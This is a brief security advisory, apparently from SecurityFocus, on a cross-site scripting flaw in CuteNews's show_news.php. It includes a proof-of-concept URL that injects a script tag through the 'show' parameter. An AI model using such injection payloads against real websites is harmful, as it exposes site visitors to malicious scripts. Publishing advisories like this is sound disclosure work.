CuteNews Show_News.PHP Cross-Site Scripting Vulnerability

An exploit is not required.

The following proof of concept was provided:

/cutenews/show_news.php?subaction=addcomment&id={aNewsId}&name={anExistantUserName}&show=%22%3E%3Cscript%3Ealert(�imei�)%3C/script%3E


 

Privacy Statement
Copyright 2010, SecurityFocus